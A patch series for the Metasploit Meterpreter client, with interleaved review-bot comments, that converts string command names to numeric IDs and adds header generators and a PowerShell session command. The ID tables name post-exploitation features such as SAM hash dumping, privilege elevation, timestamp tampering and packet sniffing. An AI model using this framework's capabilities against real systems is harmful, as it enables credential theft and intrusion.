'powershell_assembly_load' => COMMAND_ID_START_POWERSHELL + 1, + 'powershell_execute' => COMMAND_ID_START_POWERSHELL + 2, + 'powershell_session_remove' => COMMAND_ID_START_POWERSHELL + 3, + 'powershell_shell' => 
COMMAND_ID_START_POWERSHELL + 4, +} + +COMMAND_ID_MAP_PRIV = { + 'priv_elevate_getsystem' => COMMAND_ID_START_PRIV + 1, + 'priv_fs_blank_directory_mace' => COMMAND_ID_START_PRIV + 2, + 'priv_fs_blank_file_mace' => COMMAND_ID_START_PRIV + 3, + 'priv_fs_get_file_mace' => COMMAND_ID_START_PRIV + 4, + 'priv_fs_set_file_mace' => COMMAND_ID_START_PRIV + 5, + 'priv_fs_set_file_mace_from_file' => COMMAND_ID_START_PRIV + 6, + 'priv_passwd_get_sam_hashes' => COMMAND_ID_START_PRIV + 7, +} + +COMMAND_ID_MAP_PYTHON = { + 'python_execute' => COMMAND_ID_START_PYTHON + 1, + 'python_reset' => COMMAND_ID_START_PYTHON + 2, +} + +COMMAND_ID_MAP_SNIFFER = { + 'sniffer_capture_dump' => COMMAND_ID_START_SNIFFER + 1, + 'sniffer_capture_dump_read' => COMMAND_ID_START_SNIFFER + 2, + 'sniffer_capture_release' => COMMAND_ID_START_SNIFFER + 3, + 'sniffer_capture_start' => COMMAND_ID_START_SNIFFER + 4, + 'sniffer_capture_stats' => COMMAND_ID_START_SNIFFER + 5, + 'sniffer_capture_stop' => COMMAND_ID_START_SNIFFER + 6, + 'sniffer_interfaces' => COMMAND_ID_START_SNIFFER + 7, + } + +COMMAND_ID_MAP_UNHOOK = { + 'unhook_pe' => COMMAND_ID_START_UNHOOK + 1, +} + +COMMAND_ID_MAP = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + COMMAND_ID_MAP_PRIV, + COMMAND_ID_MAP_EXTAPI, + COMMAND_ID_MAP_SNIFFER, + COMMAND_ID_MAP_ANDROID, + COMMAND_ID_MAP_NETWORKPUG, + COMMAND_ID_MAP_WINPMEM, + COMMAND_ID_MAP_KIWI, + COMMAND_ID_MAP_APPAPI, + COMMAND_ID_MAP_UNHOOK, + COMMAND_ID_MAP_ESPIA, + COMMAND_ID_MAP_INCOGNITO, + COMMAND_ID_MAP_PYTHON, + COMMAND_ID_MAP_POWERSHELL, + COMMAND_ID_MAP_LANATTACKS, + COMMAND_ID_MAP_PEINJECTOR, + COMMAND_ID_MAP_MIMIKATZ, +].inject({}) {|m1, m2| m1.merge(m2)} + +def self.generate_command_id_map_c + id_map = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + COMMAND_ID_MAP_PRIV, + COMMAND_ID_MAP_EXTAPI, + COMMAND_ID_MAP_SNIFFER, + COMMAND_ID_MAP_WINPMEM, + COMMAND_ID_MAP_KIWI, + COMMAND_ID_MAP_UNHOOK, + COMMAND_ID_MAP_ESPIA, + COMMAND_ID_MAP_INCOGNITO, + COMMAND_ID_MAP_PYTHON, + 
COMMAND_ID_MAP_POWERSHELL, + COMMAND_ID_MAP_LANATTACKS, + COMMAND_ID_MAP_PEINJECTOR, + COMMAND_ID_MAP_MIMIKATZ, + ].inject({}) {|m1, m2| m1.merge(m2)} + + command_ids = id_map.map {|k, v| "#define COMMAND_ID_#{k.upcase} #{v}"} + %Q^ +/*! + * @file common_command_ids.h + * @brief Declarations of command ID values + * @description This file was generated #{Time.now.utc}. Do not modify directly. + */ +#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H +#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H + +#{command_ids.join("\n")} + +#endif + ^ +end + +def self.generate_command_id_map_python + id_map = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + ].inject({}) {|m1, m2| m1.merge(m2)} + command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"} + %Q^ +# --------------------------------------------------------------- +# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} + +#{command_ids.join("\n")} + +# --------------------------------------------------------------- + ^ +end + +def self.generate_command_id_map_python_extension + id_map = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + COMMAND_ID_MAP_PRIV, + COMMAND_ID_MAP_EXTAPI, + COMMAND_ID_MAP_SNIFFER, + COMMAND_ID_MAP_WINPMEM, + COMMAND_ID_MAP_KIWI, + COMMAND_ID_MAP_UNHOOK, + COMMAND_ID_MAP_ESPIA, + COMMAND_ID_MAP_INCOGNITO, + COMMAND_ID_MAP_PYTHON, + COMMAND_ID_MAP_POWERSHELL, + COMMAND_ID_MAP_LANATTACKS, + COMMAND_ID_MAP_PEINJECTOR, + COMMAND_ID_MAP_MIMIKATZ, + ].inject({}) {|m1, m2| m1.merge(m2)} + command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"} + %Q^ +# --------------------------------------------------------------- +# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} + +#{command_ids.join("\n")} + +# --------------------------------------------------------------- + ^ +end + +def self.generate_command_id_map_csharp + id_map = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + COMMAND_ID_MAP_PRIV, + COMMAND_ID_MAP_EXTAPI, + COMMAND_ID_MAP_SNIFFER, + 
COMMAND_ID_MAP_WINPMEM, + COMMAND_ID_MAP_KIWI, + COMMAND_ID_MAP_UNHOOK, + COMMAND_ID_MAP_ESPIA, + COMMAND_ID_MAP_INCOGNITO, + COMMAND_ID_MAP_PYTHON, + COMMAND_ID_MAP_POWERSHELL, + COMMAND_ID_MAP_LANATTACKS, + COMMAND_ID_MAP_PEINJECTOR, + COMMAND_ID_MAP_MIMIKATZ, + ].inject({}) {|m1, m2| m1.merge(m2)} + command_ids = id_map.map {|k, v| "#{k.split('_').map(&:capitalize).join} = #{v},"} + %Q^ +/// +// This content was generated by a tool @ #{Time.now.utc} +/// +namespace MSF.Powershell.Meterpreter +{ + public enum CommandId + { + #{command_ids.join("\n ")} + } +} + ^ +end + +def self.method_string_to_command_id(method_string) + unless COMMAND_ID_MAP.include?(method_string) + raise ArgumentError, "Unknown Packet command method string: #{method_string}, please report this to the Metasploit team." + end + + COMMAND_ID_MAP[method_string] +end + +def self.command_id_to_method_string(method_int) + value = COMMAND_ID_MAP.key(method_int) + + if value.nil? + raise ArgumentError, "Unknown Packet command method integer: #{}, please report this to the Metasploit team." + end + + value +end + + ### # # Base TLV (Type-Length-Value) class @@ -274,7 +729,9 @@ def inspect else tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}" end - "#<#{self.class} type=#{stype.ljust 15} #{tlvs_inspect}>" + extra = '' + extra += " method=#{self.method}" if self.class.to_s =~ /Packet/ + "#<#{self.class} type=#{stype}#{extra} #{tlvs_inspect}>" end ## @@ -908,6 +1365,7 @@ def response? # Checks to see if the packet's method is equal to the supplied method. # def method?(method) + method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String) return (get_tlv_value(TLV_TYPE_METHOD) == method) end @@ -915,6 +1373,7 @@ def method?(method) # Sets the packet's method TLV to the method supplied. # def method=(method) + method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String) add_tlv(TLV_TYPE_METHOD, method, true) end 
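Review bot: The exception raised in `command_id_to_method_string` interpolates nothing — `#{}` is an empty interpolation — so the message never contains the offending id, which is precisely what the "please report this" text asks users to supply; change it to `raise ArgumentError, "Unknown Packet command method integer: #{method_int}, please report this to the Metasploit team."`. The merged `COMMAND_ID_MAP` is built with `merge`, which silently overwrites on a duplicated name and never notices two names assigned the same number, so a copy-paste slip in these tables (e.g. two entries ending in `+ 24`) would go undetected until packets are misrouted; a load-time check such as `raise "duplicate command id in COMMAND_ID_MAP" if COMMAND_ID_MAP.values.uniq.size != COMMAND_ID_MAP.size`, and `.freeze` on the tables, would catch it immediately. `COMMAND_ID_MAP.key(method_int)` is also a linear scan over the whole table, and `Packet#method` calls it for every packet; computing `COMMAND_ID_MAP.invert` once and indexing that hash keeps the lookup constant-time.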
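Review bot: `self.class.to_s =~ /Packet/` is a fragile test for "is this a Packet": it matches any class whose name merely contains that substring and allocates a MatchData on every `inspect`; `extra += " method=#{self.method}" if is_a?(Packet)` states the intent directly. Because `Packet#method` raises ArgumentError for an id not present in `COMMAND_ID_MAP`, `inspect` itself can now raise on an unrecognized packet — exactly the case in which one most wants to see the dump — so rescuing that inside `inspect` and printing the raw id (`method=<unknown #{get_tlv_value(TLV_TYPE_METHOD)}>`) keeps it usable for debugging. `inspect` begins before the start of the hunk.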
@@ -922,7 +1381,8 @@ def method=(method) # Returns the value of the packet's method TLV. # def method - return get_tlv_value(TLV_TYPE_METHOD) + method = get_tlv_value(TLV_TYPE_METHOD) + return Rex::Post::Meterpreter.command_id_to_method_string(method) end # diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index ef464ac5d8891..46e226962d910 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -129,6 +129,9 @@ def send_packet(packet, opts={}) tlv_enc_key = opts[:tlv_enc_key] end + # Uncomment this line if you want to see outbound packets in the console. + #STDERR.puts("SEND: #{packet.inspect}\n") + bytes = 0 raw = packet.to_r(session_guid, tlv_enc_key) err = nil @@ -559,6 +562,9 @@ def decrypt_inbound_packet(packet) def dispatch_inbound_packet(packet) handled = false + # Uncomment this line if you want to see inbound packets in the console + #STDERR.puts("RECV: #{packet.inspect}\n") + # Update our last reply time self.last_checkin = Time.now diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index 9634db26cc073..fbb7ffba627c6 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb 
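Review bot: `Packet#method` now raises ArgumentError (via `command_id_to_method_string`) whenever the METHOD TLV carries an id that is not in `COMMAND_ID_MAP`, so one request from a payload built against a different command table, or one malformed packet, raises wherever `packet.method` is read — including `TcpServerChannel.request_handler`, which compares `packet.method == "stdapi_net_tcp_channel_open"` and presumably runs inside the inbound dispatch path. Returning a sentinel rather than raising lets such handlers fall through cleanly: `id = get_tlv_value(TLV_TYPE_METHOD)` then `Rex::Post::Meterpreter::COMMAND_ID_MAP.key(id) || "unknown_command_#{id}"`, with the strict translation kept for `method=` and `method?`, where a bad string is a programming error on our side. Whichever choice is made, the docstring should say it: `# Returns the packet's method as a string; the wire carries a UINT command id that is translated through COMMAND_ID_MAP.`.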
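Review bot: The commented-out `#STDERR.puts("SEND: #{packet.inspect}\n")` is dead code that has to be edited and un-edited to use; gate it at runtime instead, e.g. `STDERR.puts("SEND: #{packet.inspect}") if ENV['METERPRETER_PACKET_DEBUG']`, or route it through the framework's debug logging if one is available here (not visible in the hunk). Whatever switch is chosen should be explicit and documented, because `packet.inspect` prints TLV values, which for some commands are file contents, credentials or tokens, and that output lands on the operator's console. The same applies to the `RECV:` line in the second hunk of this file. `send_packet` begins before the start of the hunk.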
@@ -29,12 +29,45 @@ def name # def commands { - 'powershell_import' => 'Import a PS1 script or .NET Assembly DLL', - 'powershell_shell' => 'Create an interactive Powershell prompt', - 'powershell_execute' => 'Execute a Powershell command string' + 'powershell_import' => 'Import a PS1 script or .NET Assembly DLL', + 'powershell_shell' => 'Create an interactive Powershell prompt', + 'powershell_execute' => 'Execute a Powershell command string', + 'powershell_session_remove' => 'Remove/clear a session (other than default)', } end + @@powershell_session_remove = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to interact with (cannot be "default").'], + '-h' => [false, 'Help banner'] + ) + + def powershell_session_remove_usage + print_line('Usage: powershell_session_remove -s session-id') + print_line + print_line('Removes a named session from the powershell instance.') + print_line(@@powershell_session_remove_opts.usage) + end + + def cmd_powershell_session_remove(*args) + opts = {} + + @@powershell_session_remove_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + if opts[:session_id].nil? || opts[:session_id].downcase == 'default' || args.include?('-h') + powershell_session_remove_usage + return false + else + client.powershell.session_remove(opts) + print_success("Session '#{opts[:session_id]}' removed.") + return true + end + end + @@powershell_shell_opts = Rex::Parser::Arguments.new( '-s' => [true, 'Specify the id/name of the Powershell session to interact with.'], '-h' => [false, 'Help banner'] From d87cb8ca632da4c49b657cd993751fcd376f3732 Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 30 Apr 2020 17:36:48 +1000 Subject: [PATCH 03/20] Java-related UINT command ID generation --- lib/rex/post/meterpreter/packet.rb | 45 ++++++++++++++++++++++++++++-- 1 file changed, 42 insertions(+), 3 deletions(-) 
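Review bot: The option parser is assigned to `@@powershell_session_remove`, but `powershell_session_remove_usage` and `cmd_powershell_session_remove` both read `@@powershell_session_remove_opts`, so the first invocation of the new command raises NameError (uninitialized class variable). Rename the declaration to the `_opts` convention the other dispatchers in this file use: `@@powershell_session_remove_opts = Rex::Parser::Arguments.new(`. The `idx` block parameter in the `parse` call is unused and could be written `_idx`.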
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 2dcb91488aba9..83e8c2bcecc85 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -494,18 +494,57 @@ def self.generate_command_id_map_c ^ end -def self.generate_command_id_map_python +def self.generate_command_id_map_java id_map = [ COMMAND_ID_MAP_CORE, COMMAND_ID_MAP_STDAPI, ].inject({}) {|m1, m2| m1.merge(m2)} - command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"} + command_ids = id_map.map {|k, v| " public static final int #{k.upcase} = #{v};"} + %Q^ +package com.metasploit.meterpreter.command; + +/** + * All supported Command Identifiers + * + * @author Genereated by a tool @ #{Time.now.utc} + */ +public interface CommandId { +#{command_ids.join("\n")} +} + ^ +end + +def self.generate_command_id_map_php_lib(lib, id_map) + command_ids = id_map.map {|k, v| "define('COMMAND_ID_#{k.upcase}', #{v});"} %Q^ # --------------------------------------------------------------- # --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} - +# IDs for #{lib} #{command_ids.join("\n")} +# --------------------------------------------------------------- + ^ +end +def self.generate_command_id_map_php + %Q^ +#{self.generate_command_id_map_php_lib('metsrv', COMMAND_ID_MAP_CORE)} + +#{self.generate_command_id_map_php_lib('stdapi', COMMAND_ID_MAP_STDAPI)} + ^ +end + +def self.generate_command_id_map_python + id_map = [ + COMMAND_ID_MAP_CORE, + COMMAND_ID_MAP_STDAPI, + ].inject({}) {|m1, m2| m1.merge(m2)} + command_ids = id_map.map {|k, v| " (#{v}, '#{k.downcase}'),"} + %Q^ +# --------------------------------------------------------------- +# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} +COMMAND_IDS = ( +#{command_ids.join("\n")} +) # --------------------------------------------------------------- ^ end From 8070074da39e8cb11ef3677cfa31c27117d76383 Mon Sep 17 00:00:00 2001 
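Review bot: The Java template in `generate_command_id_map_java` carries a typo that is copied into every generated CommandId.java: `* @author Genereated by a tool @ #{Time.now.utc}` should read `* @author Generated by a tool @ #{Time.now.utc}`. The Java and Python generators merge only COMMAND_ID_MAP_CORE and COMMAND_ID_MAP_STDAPI, whereas the C# generator earlier in this patch merges every extension map; if that is deliberate, a one-line comment on each such as `# only core and stdapi are shipped for this Meterpreter` would keep the next reader from treating it as an omission.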
From: OJ Date: Mon, 4 May 2020 13:32:08 +1000 Subject: [PATCH 04/20] Almost final refactor of how IDs are handled --- lib/rex/payloads/meterpreter/config.rb | 18 +- lib/rex/post/meterpreter/channel.rb | 10 +- lib/rex/post/meterpreter/channels/pool.rb | 13 +- lib/rex/post/meterpreter/client.rb | 13 +- lib/rex/post/meterpreter/client_core.rb | 61 +- lib/rex/post/meterpreter/core_ids.rb | 51 ++ lib/rex/post/meterpreter/extension.rb | 4 +- lib/rex/post/meterpreter/extension_mapper.rb | 32 ++ .../meterpreter/extensions/android/android.rb | 40 +- .../meterpreter/extensions/android/tlv.rb | 20 + .../meterpreter/extensions/appapi/appapi.rb | 12 +- .../post/meterpreter/extensions/appapi/tlv.rb | 9 + .../meterpreter/extensions/espia/espia.rb | 27 +- .../post/meterpreter/extensions/espia/tlv.rb | 6 + .../extensions/extapi/adsi/adsi.rb | 2 +- .../extensions/extapi/clipboard/clipboard.rb | 18 +- .../meterpreter/extensions/extapi/extapi.rb | 4 + .../extensions/extapi/ntds/ntds.rb | 2 +- .../extensions/extapi/pageant/pageant.rb | 80 +-- .../extensions/extapi/service/service.rb | 6 +- .../post/meterpreter/extensions/extapi/tlv.rb | 21 + .../extensions/extapi/window/window.rb | 109 ++-- .../meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- .../extensions/incognito/incognito.rb | 22 +- .../meterpreter/extensions/incognito/tlv.rb | 11 + .../post/meterpreter/extensions/kiwi/kiwi.rb | 6 +- .../post/meterpreter/extensions/kiwi/tlv.rb | 10 +- .../extensions/lanattacks/dhcp/dhcp.rb | 10 +- .../extensions/lanattacks/lanattacks.rb | 4 + .../extensions/lanattacks/tftp/tftp.rb | 8 +- .../meterpreter/extensions/lanattacks/tlv.rb | 14 + .../extensions/mimikatz/mimikatz.rb | 6 +- .../meterpreter/extensions/mimikatz/tlv.rb | 6 + .../extensions/networkpug/networkpug.rb | 12 +- .../meterpreter/extensions/networkpug/tlv.rb | 7 + .../extensions/peinjector/peinjector.rb | 487 ++++++++-------- .../meterpreter/extensions/peinjector/tlv.rb | 15 +- .../extensions/powershell/powershell.rb | 11 +- 
.../meterpreter/extensions/powershell/tlv.rb | 9 + .../post/meterpreter/extensions/priv/fs.rb | 12 +- .../post/meterpreter/extensions/priv/priv.rb | 38 +- .../post/meterpreter/extensions/priv/tlv.rb | 12 + .../meterpreter/extensions/python/python.rb | 10 +- .../post/meterpreter/extensions/python/tlv.rb | 8 + .../meterpreter/extensions/sniffer/sniffer.rb | 20 +- .../meterpreter/extensions/sniffer/tlv.rb | 13 + .../extensions/stdapi/constants.rb | 1 + .../meterpreter/extensions/stdapi/fs/dir.rb | 20 +- .../meterpreter/extensions/stdapi/fs/file.rb | 18 +- .../extensions/stdapi/fs/file_stat.rb | 2 +- .../meterpreter/extensions/stdapi/fs/mount.rb | 2 +- .../meterpreter/extensions/stdapi/mic/mic.rb | 105 ++-- .../extensions/stdapi/net/config.rb | 18 +- .../extensions/stdapi/net/resolve.rb | 4 +- .../socket_subsystem/tcp_client_channel.rb | 2 +- .../socket_subsystem/tcp_server_channel.rb | 4 +- .../extensions/stdapi/railgun/library.rb | 2 +- .../extensions/stdapi/railgun/multicall.rb | 2 +- .../extensions/stdapi/railgun/railgun.rb | 4 +- .../meterpreter/extensions/stdapi/stdapi.rb | 4 + .../extensions/stdapi/sys/config.rb | 20 +- .../extensions/stdapi/sys/event_log.rb | 16 +- .../extensions/stdapi/sys/power.rb | 6 +- .../extensions/stdapi/sys/process.rb | 20 +- .../stdapi/sys/process_subsystem/image.rb | 10 +- .../stdapi/sys/process_subsystem/memory.rb | 22 +- .../stdapi/sys/process_subsystem/thread.rb | 6 +- .../extensions/stdapi/sys/registry.rb | 40 +- .../extensions/stdapi/sys/thread.rb | 12 +- .../post/meterpreter/extensions/stdapi/tlv.rb | 124 +++++ .../post/meterpreter/extensions/stdapi/ui.rb | 44 +- .../extensions/stdapi/webcam/webcam.rb | 10 +- .../post/meterpreter/extensions/unhook/tlv.rb | 10 +- .../meterpreter/extensions/unhook/unhook.rb | 8 +- .../meterpreter/extensions/winpmem/tlv.rb | 12 +- .../meterpreter/extensions/winpmem/winpmem.rb | 10 +- lib/rex/post/meterpreter/packet.rb | 520 +----------------- lib/rex/post/meterpreter/packet_dispatcher.rb | 2 +- 
lib/rex/post/meterpreter/pivot.rb | 8 +- .../ui/console/command_dispatcher/android.rb | 30 +- .../ui/console/command_dispatcher/appapi.rb | 74 +-- .../ui/console/command_dispatcher/espia.rb | 2 - .../ui/console/command_dispatcher/extapi.rb | 2 +- .../console/command_dispatcher/extapi/adsi.rb | 12 +- .../command_dispatcher/extapi/clipboard.rb | 34 +- .../command_dispatcher/extapi/service.rb | 12 +- .../command_dispatcher/extapi/window.rb | 247 ++++----- .../console/command_dispatcher/extapi/wmi.rb | 6 +- .../console/command_dispatcher/incognito.rb | 12 +- .../command_dispatcher/lanattacks/dhcp.rb | 24 +- .../command_dispatcher/lanattacks/tftp.rb | 18 +- .../console/command_dispatcher/networkpug.rb | 8 +- .../command_dispatcher/priv/elevate.rb | 12 +- .../console/command_dispatcher/priv/passwd.rb | 4 +- .../command_dispatcher/priv/timestomp.rb | 311 +++++------ .../ui/console/command_dispatcher/python.rb | 6 +- .../ui/console/command_dispatcher/sniffer.rb | 25 +- .../command_dispatcher/stdapi/audio_output.rb | 7 +- .../console/command_dispatcher/stdapi/fs.rb | 40 +- .../console/command_dispatcher/stdapi/mic.rb | 380 ++++++------- .../console/command_dispatcher/stdapi/net.rb | 18 +- .../console/command_dispatcher/stdapi/sys.rb | 116 ++-- .../console/command_dispatcher/stdapi/ui.rb | 60 +- .../command_dispatcher/stdapi/webcam.rb | 30 +- .../ui/console/command_dispatcher/winpmem.rb | 143 ++--- 105 files changed, 1982 insertions(+), 2050 deletions(-) create mode 100644 lib/rex/post/meterpreter/core_ids.rb create mode 100644 lib/rex/post/meterpreter/extension_mapper.rb diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index dd10f675de559..cc4287ca8626f 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb 
@@ -3,6 +3,7 @@ require 'msf/core/payload/windows' require 'msf/core/reflective_dll_loader' require 'rex/socket/x509_certificate' +require 'rex/post/meterpreter/extension_mapper' require 'securerandom' class Rex::Payloads::Meterpreter::Config @@ -132,24 +133,25 @@ def transport_block(opts) def extension_block(ext_name, file_extension) ext_name = ext_name.strip.downcase - ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}", + ext, _ = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}", file_extension)) - extension_data = [ ext.length, ext ].pack('VA*') + [ ext.length, ext ].pack('VA*') end def extension_init_block(name, value) + ext_id = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(name) + # for now, we're going to blindly assume that the value is a path to a file # which contains the data that gets passed to the extension - content = ::File.read(value) + content = ::File.read(value) + "\x00\x00" data = [ - name, - "\x00", + ext_id, content.length, content ] - data.pack('A*A*VA*') + data.pack('VVA*') end def config_block @@ -182,8 +184,8 @@ def config_block config << extension_init_block(name, value) end - # terminate the ext init config with a final null byte - config << "\x00" + # terminate the ext init config with -1 + config << "\xFF\xFF\xFF\xFF" # and we're done config diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index 5f697aaf4a40f..eb1be874cd9e1 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -94,7 +94,7 @@ def request_handler(client, packet) # def Channel.create(client, type = nil, klass = nil, flags = CHANNEL_FLAG_SYNCHRONOUS, addends = nil, **klass_kwargs) - request = Packet.create_request('core_channel_open') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_OPEN) # Set the type of channel that we're allocating if !type.nil? 
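Review bot: In `extension_init_block` the length packed with `V` is `content.length`, a character count, while the payload is packed as raw bytes with `A*`; `::File.read` returns a string in the default external encoding, so an init file containing non-ASCII bytes produces a length field that disagrees with the data following it. Reading with `content = ::File.binread(value) + "\x00\x00"` and packing `content.bytesize` keeps the two consistent. In the `config_block` hunk the -1 terminator is appended as the literal `"\xFF\xFF\xFF\xFF"`, whose encoding depends on the file's magic comment and can raise Encoding::CompatibilityError when appended to the binary `config` string; `config << [0xFFFFFFFF].pack('V')` matches the surrounding `pack` calls and has no such dependency. `config_block` starts outside the hunk.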
@@ -179,7 +179,7 @@ def _read(length = nil, addends = nil) raise IOError, "Channel has been closed.", caller end - request = Packet.create_request('core_channel_read') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_READ) if length.nil? # Default block size to a higher amount for passive dispatcher @@ -227,7 +227,7 @@ def _write(buf, length = nil, addends = nil) raise IOError, "Channel has been closed.", caller end - request = Packet.create_request('core_channel_write') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_WRITE) # Truncation and celebration if ((length != nil) && @@ -290,7 +290,7 @@ def self._close(client, cid, addends=nil) raise IOError, "Channel has been closed.", caller end - request = Packet.create_request('core_channel_close') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_CLOSE) # Populate the request request.add_tlv(TLV_TYPE_CHANNEL_ID, cid) @@ -322,7 +322,7 @@ def interactive(tf = true, addends = nil) raise IOError, "Channel has been closed.", caller end - request = Packet.create_request('core_channel_interact') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_INTERACT) # Populate the request request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) diff --git a/lib/rex/post/meterpreter/channels/pool.rb b/lib/rex/post/meterpreter/channels/pool.rb index f0b283e94367c..a413057657b4c 100644 --- a/lib/rex/post/meterpreter/channels/pool.rb +++ b/lib/rex/post/meterpreter/channels/pool.rb @@ -51,7 +51,7 @@ def initialize(client, cid, type, flags, packet, **_) # Checks to see if the EOF flag has been set on the pool. # def eof - request = Packet.create_request('core_channel_eof') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_EOF) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) 
@@ -106,33 +106,32 @@ def seek(offset, whence = SEEK_SET) raise RuntimeError, "Invalid seek whence #{whence}.", caller end - request = Packet.create_request('core_channel_seek') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_SEEK) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) request.add_tlv(TLV_TYPE_SEEK_OFFSET, offset) request.add_tlv(TLV_TYPE_SEEK_WHENCE, sane) begin - response = self.client.send_request(request) + self.client.send_request(request) + tell rescue return -1 end - - return tell end # # Synonym for tell. # def pos - return tell + tell end # # This method returns the current file pointer position to the caller. # def tell - request = Packet.create_request('core_channel_tell') + request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_TELL) pos = -1 request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index 4fa77316b5242..82caf1b4ace9d 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -4,6 +4,7 @@ require 'openssl' require 'rex/script' +require 'rex/post/meterpreter/extension_mapper' require 'rex/post/meterpreter/client_core' require 'rex/post/meterpreter/channel' require 'rex/post/meterpreter/channel_container' 
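Review bot: The bare `rescue` in `seek` now also wraps the moved `tell` call, so any error from that second request — including a programming error such as NoMethodError — becomes a silent `-1` instead of surfacing; previously only `send_request` was guarded. Either keep `tell` after the `begin`/`rescue` block or narrow the clause to the error class `send_request` raises, e.g. `rescue ::Rex::Post::Meterpreter::RequestError`. `seek` starts outside the hunk.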
@@ -321,17 +322,7 @@ def add_extension(name, commands=[]) # Check to see if this extension has already been loaded. if ((klass = self.class.check_ext_hash(name.downcase)) == nil) - old = Rex::Post::Meterpreter::Extensions.constants - require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}") - new = Rex::Post::Meterpreter::Extensions.constants - - # No new constants added? - if ((diff = new - old).empty?) - diff = [ name.capitalize ] - end - - klass = Rex::Post::Meterpreter::Extensions.const_get(diff[0]).const_get(diff[0]) - + klass = Rex::Post::Meterpreter::ExtensionMapper.get_extension_klass(name) # Save the module name to class association now that the code is # loaded. self.class.set_ext_hash(name.downcase, klass) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 18e013e29ec03..ace583fb52501 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -1,7 +1,9 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/packet' +require 'rex/post/meterpreter/core_ids' require 'rex/post/meterpreter/extension' +require 'rex/post/meterpreter/extension_mapper' require 'rex/post/meterpreter/client' require 'msf/core/payload/transport_config' @@ -47,6 +49,10 @@ class ClientCore < Extension include Rex::Payloads::Meterpreter::UriChecksum + def self.extension_id + EXTENSION_ID_CORE + end + # # Initializes the 'core' portion of the meterpreter client commands. # @@ -64,7 +70,7 @@ def initialize(client) # create a named pipe pivot # def create_named_pipe_pivot(opts) - request = Packet.create_request('core_pivot_add') + request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD) request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) 
